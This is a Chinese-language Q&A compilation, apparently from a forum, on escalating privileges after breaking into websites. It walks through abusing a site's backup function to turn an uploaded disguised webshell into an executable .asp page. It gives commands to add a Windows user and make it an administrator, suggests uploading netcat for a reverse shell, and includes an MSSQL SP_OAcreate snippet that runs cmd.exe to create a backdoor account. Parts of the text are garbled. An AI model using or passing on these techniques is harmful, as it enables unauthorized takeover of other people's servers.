文章大纲：

• 1、网站入侵怎么提权得webshell
• 2、哪位有网站入侵提权方面的命令收集，还有NC，端口转发之类命令大全收集的，谢谢分享下
• 3、入侵网站怎么提权拿服务器啊
• 4、如何网站提权
• 5、入侵后如何提权，利用SQL连接器的命令。
• 6、db_owner权限WEBSHELL提权问题（曰本网站。英文2003操作系统）

网站入侵怎么提权得webshell

如果后台有备份就简单了

备份有两行

记住刚才小马的地址比如uploadfile/1231232131.jpg

把这段复制到备份的之一行../database/213212-1231232.mdb

替换database/213212-1231232.mdb成uploadfile/1231232131.jpg

下一行写xxxx.asp

点备份

如果成功了的话 把得到的地址打到地址栏如果后缀是xxx.asp.asa

直接输入xxx.asp

哪位有网站入侵提权方面的命令收集，还有NC，端口转发之类命令大全收集的，谢谢分享下

你更好联系具体个人，这种东西很少会公开的，除非某些专业论坛，但是通常是要注册收费的。

也许有人会单独联系你，不过~~~~~盗亦有道。。。。。。。。。。。。。

入侵网站怎么提权拿服务器啊

漏洞或本地溢出等 *** 将自身建立的用户提升为管理员或root权限

如何网站提权

呵呵，提权的方式可以通过serv-u提权，可以通过mssql提权

方式很多

但是现在一般的服务器安全都做的不错的，除非是以前的老服务器，或个人配置的服务器

建议可以学习提权，尽量少搞破坏。毕竟人家做个网站不容易的

入侵后如何提权，利用SQL连接器的命令。

入侵后看shell脚本有没有cmd的运行权限 有的话添加administrators组的成员账号,然后再利用远程屏幕连接登陆就可以了！

具体命令是 net user 用户名 密码 /add

net localgroup admintrators 用户名 /add

db_owner权限WEBSHELL提权问题（曰本网站。英文2003操作系统）

通过你说的我想到了以下几个 *** 。

1、上传个NC上去反弹回来一个shell，权限和在webshell里的权限是不一样的。

2、SQL里面用沙盘模式试试。

P_OAcreate可以用

用SP_OAcreate一样可以执行系统命令

在查询分析器里执行

DECLARE

@shell

INT

EXEC

SP_OAcreate

'wscript.shell',@shell

OUTPUT

EXEC

SP_OAMETHOD

@shell,'run',null,

'C:\WINdows\system32\cmd.exe

/c

net

user

gydyhook

hook

/add'

这段代码就是利用SP_OAcreate来添加一个gydyhook的系统用户

然后直接提升为管理员权限就OK了.

祝你好运！！！！